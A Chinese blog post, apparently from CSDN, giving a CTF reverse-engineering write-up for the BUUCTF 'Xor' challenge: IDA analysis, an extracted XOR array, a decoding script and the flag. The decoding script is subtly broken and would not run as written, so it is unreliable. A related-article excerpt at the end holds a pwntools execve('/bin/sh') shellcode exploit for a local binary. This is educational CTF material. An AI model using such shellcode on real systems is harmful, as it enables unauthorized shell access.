BUUCTF----Xor（天璇战队提供题目）

最新推荐文章于 2024-12-11 16:15:53 发布

晓风.

最新推荐文章于 2024-12-11 16:15:53 发布

阅读量615

点赞数 1

分类专栏： CTF 文章标签：其他

本文链接：https://blog.youkuaiyun.com/qq_64558075/article/details/121782207

版权

CTF 专栏收录该内容

24 篇文章

订阅专栏

本文介绍了通过IDA Pro进行二进制文件分析的过程，包括检查文件无壳、遇到反编译错误的解决方法，以及如何从代码中解析出异或加密的数据，并通过脚本解密得到flag。最终成功验证flag，展示了逆向工程在信息安全中的应用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.还是一样，拿到文件，习惯查壳

收集信息，无壳，32位程序

2.拖入ida中

F5转伪代码的时候，显示出错，翻译一下英文

发现不能正常反编译

百度一下原因，可能有两个

1、IDA无法识别出正确的调用约定。
2、IDA无法识别出正确的参数个数。

观察call调用的函数

发现就只需调用一个参数，所以是参数问题，去掉后面的一个参数就可以了

鼠标选中该函数，然后按y键，去掉后面的那个参数（可能显示不一样，我第一次做的时候显示是..., 但是现在写的时候右显示char），然后点OK，就可以正常F5了

3.进入主函数

发现就是一个简单的异或

接下来就是抠数据，然后写脚本

tmp=[0x4D,0x53, 0x41, 0x57, 0x42, 0x7E, 0x46, 0x58, 0x5A, 0x3A,0x4A,0x3A, 0x60, 0x74, 0x51, 0x4A, 0x22, 0x4E, 0x40, 0x20,0x62, 0x70, 0x64, 0x64, 0x7D, 0x38, 0x67]
flag=“”
for i in range(27):
	flag[i]=i^tmp[i]
print(flag)

最后得出flag为MRCTF{@_R3@1ly_E2_R3verse!}

拿到网站进行验证

正确！！！！！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晓风.

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

【buuctf】xor

qq_37301470的博客

02-10

813

buuctf xor 主函数 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // rsi@1 __int64 v4; // rax@8 signed int i; // [sp+2Ch] [bp-124h]@2 char input[264]; // [sp+40h] [bp-110h]@1 __int64 v8; // [sp+148h] [bp-8h]@1 v8 = *

2021寒假MISC打卡DAY3

煤矿路口西的博客

01-13

681

[SWPU2019]Network 得到的 flag 请包上 flag{} 提交。一道平平无奇的脚本题 63 127 255 通过进制转换联想到00 01 10 11 f = open("attachment.txt", "r") s = '' tmp = '' while 1: num = f.readline() if not num: break if num.rstrip() == '63': tmp = '00' ...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF--xor

weixin_30876945的博客

09-04

739

测试文件：https://buuoj.cn/files/caa0fdad8f67a3115e11dc722bb9bba7/7ea34089-68ff-4bb7-8e96-92094285dfe9.zip?token=eyJ0ZWFtX2lkIjpudWxsLCJ1c2VyX2lkIjoxOTAzLCJmaWxlX2lkIjoyMzl9.XW-jSA.6pb2caCKvD2RceQo5Ei...

buuctf xor

qq_66455531的博客

03-17

225

buuctf xor

BUUCTF xor

m0_49025459的博客

02-17

384

然后我们用python写个脚本，来a^b=c 等于 a^c=b函数还还原出，flag。由下面的代码我们可知，在global存放的字符串是执行过上述算法后得到的字符串。由下面的代码我们可知，将输入的字符串从第二位开始，后一位与前一位异或。由下面的代码我们可知，字符串的长度为33位。跳到如下界面后，我们再次双击，下面的字符。我们就找到了，我们需要去疑惑的字符串了。然后使用按键F5，查看一下主函数。然后我们来分析一下这个这串代码。下载附件，用IDA-64打开。

[Buuctf] xor

Bileton的博客

02-25

888

isinstance()函数的返回值是布尔型，若object的类型是classtype，那么就返回True，否则返回False。由运算规则可知，任何二进制数与零异或，都会等于其本身，即 A ^ 0 = A。不是exe文件，是Mac OS64位文件，没有壳。找到main函数，F5查看反汇编。所以我们要拿到的flag是输入的。在经过异或运算之后，如果与。相同为0，不同为1，即。是我们输入的字符串，双击global查看。

BUUCTF_xor

weixin_46009088的博客

10-16

2535

BUUCTF_xor 用IDA载入xor，按F5打开_main函数，查看C代码，如下：有两个关键函数strlen和strcmp，strlen指出该字符串长度是33，strcmp将v6和global进行对比，可见global是xor后的结果，点击global来到字符串的位置，看到下面的字符串。再点击进去找到最终的字符串：用python写出注册机： s = ['f',0xA,'k',0xC,'w','&','O','.','@',0x11,'x',0xD,'Z',';','U',0x11,.

buuctf——xor

yhfgs的博客

05-27

2882

1.主要文件为xor，查壳，丢到DIE中。无壳，64位文件。 2.丢到IDA中，找到main，F5. 3.分析代码，由第一个if可知flag长度为33. for循环是对flag进行异或运算第一个数不变。下一个if是比较flag和global（即flag异或运算后是global），查看global。 4.写脚本。 4.get flag ...

Buuctf中的XOR

在Web和Reverse坑里游泳中。。。。

11-08

387

最近突然忙起来了，忙里偷闲的做道题。

从零开始的[BUUCTF-xor]

Almosttmr的博客

10-09

573

[BUUCTF-xor] 前言：认识了简单的伪代码之后，要开始看复杂的了。 1. 在exeinfo中确认信息后，放入ida，找到main函数，f5查看伪代码直接从网上扒来的图，因为我第一眼真的看不懂啊呜呜逻辑具体是：首先判断我们的输入v6长度是否为33，不是就进入label_12，下面可以看到就是返回"Failed"。然后i=1，v6[1]代表从输入的第二位开始，^=表示异或（即xor）。即把两个数据二进制化，对位相同则输出0，不同输出1，再以输出的二进制转换回来。例子：5和3转为二进制分别为：

BUUCTF逆向题Xor

于高山之巅，方见大河奔涌；于群峰之上，更觉长风浩荡。

09-08

2585

1、IDA（32位）①、运行程序，发现窗口会出现一段字符串我们在字符串窗口尝试找一下这串字符双击定位到关键位置，双击选中这段字符串，交叉引用显示图表视图，会发现无法生成伪代码，那就分析汇编代码②、由mov al,[edx] 可知 al 保存着 edx 的值，inc edx 表示edx自增 1 ，cmp edx,1Bh 是 edx 的值与 1Bh（十进制：27）进行比较，若 edx 的值大于 27 则执行 wrong 那一块的代码。

BUUCTF re xor 1

qq_42921782的博客

12-11

329

逆向入门

BUU ctf之xor

weixin_47158947的博客

07-15

2511

需要用的知识点：两次xor等于没有xor 学到的软件操作：shift+e提取字符数组！！！！ 1.主函数反汇编得到伪代码下面展示一些内联代码片。下面展示一些内联代码片。 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // rsi int result; // eax signed int i; // [rsp+2Ch] [rbp-124h] char v6[264]; // [

BUUCTF 31 [MRCTF2020]Xor

qq_62987578的博客

10-30

153

直接反编译，发现不行，跳到sub_401020函数，再反编译，之后从左侧函数栏选则main函数，得到。做一下修改，这样看起来就清楚多了，输入一个flag，然后后面对flag进行了一个异或操作。得出MRCTF{@_R3@1ly_E2_R3verse!则flag{@_R3@1ly_E2_R3verse!再查看一下key，现在就可以根据这些来写脚本了。查壳，无壳32位，拖入IDA中分析。

Buuctf xor 解题记录

jsbbd12的博客

07-28

424

buuctf xor的解题记录

re学习笔记（1） BUUCTF-re xor

逆向随笔

10-28

2392

题目地址https://buuoj.cn/challenges#xor 用ida载入，寻找main函数，F5打开伪代码双击进入global，查看其存放的数据开始写python脚本~ 运行得到flag flag{QianQiuWanDai_YiTongJiangHu} 成功！ ...

《BUUCTF逆向题解》——xor

qq_62735163的博客

04-10

2200

常规查壳无壳 64位程序用IDA打开，F5查看伪代码很明显 _b就是input,global就是key了 input的每一位（除了第一位）与前一位的异或就是key了查看key,对应着一个字符串用shift+e取出数据（16进制）开始写脚本 key=[0x66,0x0A,0x6B,0x0C,0x77,0x26,0x4F,0x2E,0x40,0x11,0x78,0x0D,0x5A,0x3B,0x55,0x11,0x70,0x19,0x46,0x1F,0x76,0x.

BUUCTF-others_shellcode

最新发布

03-26

### BUUCTF Others Shellcode 题目解题思路 BUUCTF中的`Others_Shellcode`是一道典型的PWN类题目，主要考察选手对于Shellcode编写以及Linux环境下的漏洞利用能力。以下是关于该题目的核心解题思路： #### 一、题目背景与目标此题目提供了一个可执行程序文件，其功能是读取用户输入并尝试运行特定指令。然而，由于存在某些安全机制未启用（如NX位关闭），攻击者可以注入自定义的Shellcode来实现任意命令执行。通过分析可知，目标是要构造一段能够绕过现有防护措施的有效载荷(shellcode)，最终达到获取flag的目的[^1]。 #### 二、具体技术细节解析 1. **逆向工程** 使用工具如Ghidra或者Radare2对给定二进制文件进行静态反汇编分析，确认入口点函数逻辑及其调用链路情况；同时也要注意查看是否有其他隐藏的功能模块被触发的可能性。 2. **确定ROP Gadget** 如果发现保护机制开启了部分控制流完整性验证，则可能需要用到Return-Oriented Programming (ROP) 技巧构建新的执行流程路径。这一步骤涉及查找合适的gadgets组合形成所需的系统调用序列。 3. **编写Shellcode** 基于上述准备好的信息，按照实际需求定制化设计payload内容。考虑到不同架构下寄存器分配规则差异等因素，在撰写过程中需格外小心处理字节顺序等问题以免引起错误行为发生。 4. **测试与调试** 利用QEMU模拟真实机器环境下多次试验调整直至成功完成挑战为止。期间还可以借助strace跟踪进程活动状况以便更好地理解整个交互过程的工作原理。 ```python from pwn import * context.arch = 'i386' shellcode = asm(''' xor eax, eax # 清零EAX 寄存器 push eax # 将 NULL 推入堆栈作为字符串终止符 # 此处创建 "/bin/sh\x00" 的一部分 push 0x68732f6e # hs/n push 0x69622f2f # ib// mov ebx, esp # EBX -> 参数1: 文件名指针 ("//bin/sh") cdq # EDX <- EAX 扩展成双字长形式 (清零EDX) # DX 是第二个参数，这里不需要设置任何东西 mov ecx, edx # ECX <- 第三个参数也是NULL mov al, 0xb # AL 设置为syscall编号 execve() int 0x80 # 发起中断请求操作系统服务 ''') p = process('./vuln') p.sendline(shellcode) log.success(f'Shellcode Sent! Waiting for shell...') p.interactive() ``` 以上脚本展示了如何生成适用于Intel x86体系结构的一个简单execve("/bin/sh", ...) 调用样例，并发送至服务器端等待响应。 --- ###